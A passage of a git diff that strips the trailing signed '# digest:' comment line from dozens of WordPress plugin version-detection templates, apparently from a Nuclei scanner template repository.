490a0046304402203d3ecedc64a1ed41495e67629c022950a33cb8a26f14f5c1d143383ffa61559c022044268e78f465db796353a2f6ce8041628bdf545ed2cf9cee4972e783d812504e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c5fc9f59a5..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a1697f0e1615733cb713ecd546d24b3746854b7161f082794db995ddc1ea4a36022100cb50242475451e0bace5695999bc43ab90bcd8ac81fb0e31c7b6982e74b715b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1d5cd6d4b4..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022021bf8383e90ad919339daf6c61019a2802a19846a93b2c40d289a5922949c32f02206214df6d4b5a9a9f088c38dcc701916525ccf0f84c4821a9653d5ada399540e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index e6c061fda6..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220497a159cc901ed69ffa01fdc227d7d594114091b55411703a2be591570d56dcd022100c3c466560b1e7107b2a2d82ee64d0a4e6b1ec3f00cc04b4c0a8dbe0385d27291:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 761da4ae86..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cf090a629d70735d73436e8eb44430be3a02838e5d38e4961abb8a4ac289f4b9022100871ca51de661931e7c094c75fdbdcf86032032c5aefd0efb819aa1cfdfc09964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 06feb3e405..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202470cf2bd8cb82f6c1f6604b91ebe8a30f283e2b67a2f9cda92df03d0235fa52022100a560facfd93321a53f28f50ce09c7573b7e2bb12adcb6abae9a7a3000f420967:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 0a42c77bc6..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b806c4b4d24373cb5f6cbde245082216925cb83077b2c49620fe066aa1a6f80402205cb03d003817d260de21f83f55fd5da7caec279e486d3a584686686fd26da0e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 8b799c3df1..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203d1bae898e6c99c5ab78ab7406e802b6f54e8165f0fab76da69f20aca2433f5f0220064c3b4d79d17944e31e597cb1bc270ce804b48596bd5729660f18e1d372c221:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 7b88e6584a..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ca099a6110a7d392c23658a109c332da89d0f0a67a168fce8050a5b5b85d0e8f022100a895e6e001998c0fda8bfd7f5861adac57aa911f01d88bcc18bf20b6827187e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 41e7ad51c6..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204fa0d16fd73ff3d5dd5370829046d280b743e27b24d5e95b45b97d6658dea401022039f37c52a94ec584f81964b6e309e869664e32c04e09acbbf7f1444f9988ada1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 87a6688b3e..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dc28c168edec23f99293ee0fca3ae05d11f28c0f70e166cf99a7045e3a30e9900221009a7c444bdfd19f036e86d551b269e0f32fe5896ec901cb72aedf13a84127e55f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 7132ae0270..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009d03d6ed40f9cc2f82ed1c7909821886cc6f369b61ae438dd11644ecf9699472022100a1aa049f593f4692cfaf5d885fc1901cae188efce6de317096b68d3f59701a8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 95cb7e18c5..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207ebdf1f79b458ee91bc6900456ffe364907da1715a12d044b6a47ef33fc9a99e022029d67ace11dce4873b19a6e6979c638461592528f80480590a55f8b40b9e3b20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 9654318ace..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f2bc0b8c5f5ec87cc6b1cb83928d5000a0cc03aede1ef37a4593e3193c0793f302204314198d3860ea7b3c15763e407b01172d368fc5cdbf8c9897de3ee1c058ceef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a71dcaedf4..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fa48d526097bfac73d5fae26b97b0574d72b192b6b7c3d4bb5e5329b2dc378d3022100fad2c729185284ed7c06668707eb2e7dc489274caf473c34b024a863a594c16e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index a8ef85aa8c..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022003b2aed626587e89913bb60a407658a392e68f8f85a7b06541445797e657c24f022100944607b5b67f3a415fdbae9e098ad5414d38529b2eddf7961e1e8afde050dc3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3797fd11b6..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220448f51b61cb36953bb7e010ff0db38882ac5f869cce7d63e9c6d6d50e2319d0702205225ce376310bfb3c93570f7d6e2a30c582ffd2411a505367a24b819361c5171:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index c3e3f4a9e4..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220117309b757a2f3f53327f3925726ba8a94da8d235b8ce5669544be7cbaf60e5f022100f31910767808ca4f56df2f3f8826460d1ba5e1b9916f2394da129b712c07b631:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1a193d56e3..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200c53ba50a5cb4c417a9763ec17536b0d3fb5e9238711b526f2af174be312b2ef0220571a098ccfa7322e55f509cb5b1ec32b9da86fc1218aa7e759233639d6655b3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index be73c35c62..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b6e4d738fcb147cf4f3e8bf1eb92e8705b0c21e2ac5f98757acc16e0556be707022100bf44b6b7fa4328a6f59fcea5c0fb184746117e46000a38554ec6fb387a9c8139:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 06e52fcda1..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b5aacf867e08082712e8a468adfbfcc395e08a72090705a16c81f5bd314ab6ce022100f7c30b51119f4cd6e3209ad84eb40c2396b65471d6d6dc4b14005bc82fb20f66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 7396019832..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ee49835ceffe5e456cff41b2e1749e99ab7740393daa4809738ef9e4ea73d7eb02200152a5e293521ac44152294367053a847b9644e29d6b3351269a4533538da840:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 8f947011b1..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dc79db1ebe127cd40be2a13a05d92f7df022433719daf584eca20e0496ca50d4022100c02c91546fa2d06e8933f8d809dc01ea142909bf384cdaa0cc82a29d55419a8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index f90c1483fe..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022069b56b9d627d1b9a8bc96f32dc98122a706575ef084fc0c0a01b1a68eeef256502200d08e8889d6faea6c3a3a8ed89dd93a784d82e0e387dac58a5ae2fb47de45521:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index c77b1e685b..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d033fdfebe5c9182af08adf62f491399a0c111a30546821f0ce57870c0e654ea02202057197369b6aadf363902fa149f6bd6b60c3bab3528d63e048b41db9b850665:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index f98e2184df..4f99876557 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cf462618af3c024840a9a6a0ffa3b3d2882e44d812e7e666347f82da30ad79ce02207f5c5bb8499fac6373f2a8699fe5d70a555135433bad0e2f13b93f8a99277dea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a7482b43d2..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203a57076881e998e6a9b2d6e0da95986c318c61838791c0229f37d6ab4b6890a702203862d7c021ea5a4a82fd35660d69b6fb49f66b7d444243f553f8ed390f7373ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index ac2b61bc83..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220655b7b4a7e532e5871998d8bd5fecd0490938d241ae88d37915bc1237c91fc59022100c47e2f0a3e3c61ae4eec943185085cef640272d39fd7ec8ceab79aeea6f1fd39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 71f7c13f2e..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f84ac2128cceaabcc1c605f156724375406577d68c1e2ededed57319dc2192ca022100c2e6414960ed3845782499339ffbed0e3b6865a505122af04113245d786c6eb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index c759db485f..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100db5f821076ebaefe16d055aa616113fa62585fd7d8c36cb424930c410af5dd11022100a405d054973b1e54a9907facd7786e1e13a0ce39dc463dbc674be100521acee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index b63b208457..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009035d88d9cc649a6271bf48c964cddb9b7a9f3b09b64f569db57f2cba4c858990220699063451b01e4744ed62271898c351f1492753d697d724da41dfa9b9aefeef8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index e73979aeba..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201eb22bb3ac1e1c9a2159f41a465e92097ab8275e7eaca5926fef623f711d02e4022100968b2641b6d8b183cc268ccaee308a17a9372aca1271254a8f80d94e6c3e16d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index ddc1fca3e4..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220081cf9f531c1f22eb11d2d2297c12889131883ead45a96a0daec84526433a0120220763c3776f1d8a734ef51e4d73af08e99fa5225f23abc6145644737b4b350455b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index e2c76563d9..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aa41d52df7266867a7865af5ad291990a4f456c8b585d659efc4ea0f9c48d309022034ade6040143415c459fa247e38baa6887ad4739d3ec72f92b9a63531670dd1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 7e379cccd4..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eee10f47e0be718166abc9c9e2ad615c5ae08692c34285465b3429cccde3bd78022100d98662ce6d48009094ed86716d50bb1837d7323d3e413f5ae9f6b6be111f49e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 7573327519..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009a54a8eb939ba740c4845ca5e1b89b9dd0012a8ceac7ca1b4982caf951f3bcf7022071df75671043d5fec635ea763f155f709b001ea74ab988f13f74cfd63f61b890:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index c0df48d691..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022016af61d0595d1c0d2501ce3cb9151f6547dc109a76fb8dfc98dc0f8be9419b52022100a56e888db1bccb3fd1759dcb4fbbf96c8748fb94bc58ad84955d361b1a1d5d34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 607bc477ae..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c73199281262659725a29e0c4df1f463b1e405663e4589722432697d22717b34022075888f879bba46ff17b640bb7f56faed90f0519c61ef648ac0c6352f88534946:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 0160d30735..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b66f4f7fb0895ca571f48708488e952e98f469fd2ceb61c023f67edf2caa6eeb0220409b6b6b9b376af5688f7696d97addff2d3fdbc7edd14910bcb69ec541900d0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index c7ba48f81b..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cf7bb8172ecbb2fdaa8cdbf97748568c9b3eb3fd4dc2b016ecbd7708099fb278022017a9c6160255a45ee9ede3aef3b6182768bb74343f3336a78721b57c76f88c4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 1fc244c7ea..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ed83ae649501d1268830669a57233c0b2e7408c8af7adcb18bea87b03794ccb602200edd7271ac1a96aca7633a04588dcade60886168946f08489b5674f8abfd2a4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 7cef1cea94..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204446eeeb349956f6e6ef7b444a3e2333f1253868708df36628715d2fcb75cf3802206a327f9102967633e3b8979cab547c00d04fb6f081b8edcdbb89e8f7f42f1bcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index facf88f1c2..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220092152c9968e6d6a1efc2bb98fd2c8c6d24e9fb16c22ffb237d019e1b3627f310220034e697e0557176f1d431bba3893a5d8bb447eb6791eeaec1b5ed1dc53efc4c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index a11a2df0a1..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d15a477e7f6dde5f753073dcfba7300fdb45e849e60de3da5ca208e44edc1d270220069a5305727fc2e23c570f7ebe76e8e5e016fc1263f97cb34a067b0e348c3f7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 17b6c086ba..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204ba05b595d34a51dfea9ecb1c69ff88e4c8f65390f344ff38588cf450bf7d358022100f6f8795b0fd6b3a276ef4ed0f36a920604384e18d075c9b07ac2603c6110c1e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 4797fc3c22..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022060b4a0e83e1ac47da43804d7f005c0bfd5c23a7de5b2981915f9c53471696341022039dd08a4ef487b4a560131305ab46140d58c17cf728d6ef45933491d0a949187:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index e9528f7aeb..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb34556570ecd13f3ff5cceafe4186b1d512c424ebe2e8786ba723437e21cffa022056787c5e8c723b53d4f16f77fb97cc8c901814c6bc9e0a3760edb194c3d4ca90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 24489578ee..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009ec1daad6e1a7c9fc947ff170fd6c0d99e2e5440cbc189168de662ba0d47000b02205a1285996a57910ade94f84872f9f7cab8a04a1efa66750e142f9bdfc18e534b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 